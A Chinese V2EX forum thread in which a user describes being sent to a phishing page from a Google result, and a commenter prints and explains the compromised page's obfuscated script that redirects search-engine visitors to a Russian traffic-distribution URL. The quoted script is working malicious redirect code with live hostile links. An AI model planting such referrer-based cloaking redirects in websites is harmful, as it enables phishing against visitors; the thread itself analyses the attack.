第一次在 google.com 被钓鱼

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

现在注册

已注册用户请登录

V2EX 提问指南

这是一个创建于 1715 天前的主题，其中的信息可能已经有所发展或是发生改变。

手动重现

Google 搜索 notion dropbox paper： https://www.google.com/search?q=notion+dropbox+paper
然后点结果中的这个钓鱼链接： http://staging.swisse.com.au/dropbox-paper.html
几次跳转后：🎉

录了个 Gif： https://i.imgur.com/KnY04hA.gifv

问题

为什么直接访问这个钓鱼页就不会被钓鱼？通过 refer 判断的吗？
- 在 Google 搜索结果页点击才会被钓鱼（不对，好像是只要有 refer 都行），如果直接访问是正常显示的 notion vs dropbox peper 的一篇东拼西凑的文章。
哪个环节出的问题？
- 应该就是 swisse.com.au 被挂了这个钓鱼页吧？
- 或者 HTTP 被篡改？（但访问 swisse.com.au 人家有 HTTPS 呀）
- 我装的某个 Chrome 插件有问题？
- 或者是我用的代理？

其他网站上（特别是各种色情网站）遇到钓鱼链接倒不稀奇，但在 google.com 上遇到且 Chrome 还没红屏警告的，这是第一次碰到。

一知半解，有大佬分析一下吗？

钓鱼

notion

Dropbox

refer

5 条回复 • 2020-03-06 19:29:38 +08:00

xylxsss

2020-03-06 15:48:00 +08:00

路由器被劫持了吧。

imdong

2020-03-06 16:03:58 +08:00

不是劫持，就是典型的黑产 SEO 性质的东西。

页面加载了唯一 JS ( http://staging.swisse.com.au/js/stats.js)

```javascript
class Task2 {
static ["com2"]() {
var _0x4014c2 = document.title.split(" - ");

var _0x28236f = _0x4014c2[0].split(" | ");

function _0x19737c(_0x3c4e45, _0x1f88c8, _0x43a6f0, _0x17db9b, _0x142f63, _0x1a5f1a) {
if (!_0x3c4e45 || !_0x1f88c8) return ![];

var _0x3405ea = _0x3c4e45 + '=' + encodeURIComponent(_0x1f88c8);

if (_0x43a6f0) _0x3405ea += "; expires=" + _0x43a6f0.toGMTString();
if (_0x17db9b) _0x3405ea += ';\x20path=' + _0x17db9b;
if (_0x142f63) _0x3405ea += "; domain=" + _0x142f63;
if (_0x1a5f1a) _0x3405ea += "; secure";
document.cookie = _0x3405ea;
return !![];
}

function _0x49f35b(_0x3b366b) {
var _0x2d3ad0 = "(?:; )?" + _0x3b366b + '=([^;]*);?';

var _0x5ede30 = new RegExp(_0x2d3ad0);

if (_0x5ede30.test(document.cookie)) return decodeURIComponent(RegExp.$1);
return ![];
}

function _0x35790f(_0xe10d12, _0x1aca07, _0x43ad37) {
_0x19737c(_0xe10d12, null, new Date(0), _0x1aca07, _0x43ad37);

return !![];
}

var _0x5e520f = {};
_0x5e520f.searchers = [[/google\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.yahoo\./i, /(\?|&)p=(.*?)(&|$)/i, 2], [/bing\.com/i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.aol\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/ask\.com/i, /(\?|&)q=(.*?)(&|$)/i, 2], [/altavista\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.lycos\./i, /(\?|&)query=(.*?)(&|$)/i, 2], [/alltheweb\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/yandex\./i, /(\?|&)text=(.*?)(&|$)/i, 2], [/(nova\.|search\.)?rambler\./i, /(\?|&)query=(.*?)(&|$)/i, 2], [/gogo\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/go\.mail\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/nigma\./i, /(\?|&)s=(.*?)(&|$)/i, 2]];

_0x5e520f.sp_redirect = function (_0xa5e498) {
var _0x50a397 = null;

for (var _0x592205 = 0; _0x592205 < _0x5e520f.searchers['length']; _0x592205++) {
var _0x5da909 = _0x5e520f.searchers[_0x592205];

if (_0xa5e498.match(_0x5da909[0]) || _0x49f35b("opos") == '1') {
_0x19737c("opos", '1');

document.location['href'] = "http://tr.stoneshards.ru/trds?q=" + _0x28236f[0];
break;
}
}
};

_0x5e520f.sp_redirect(document.referrer);
}

}

Task2.com2();
```

只要是来路 referrer 是来自 _0x5e520f.searchers 数组内的网站，就跳转到 tr#stoneshards#ru/trds?q={title}

imdong

2020-03-06 16:06:37 +08:00

对了，多刷新几次，每次都有新感觉。

Dreax

2020-03-06 19:27:40 +08:00

是劫持我这儿直接打开和走梯子都没问题

Dreax

2020-03-06 19:29:38 +08:00

@Dreax 没看仔细从 google 结果页打开的确是进入钓鱼页面了还做了本地化显示了我这边的语言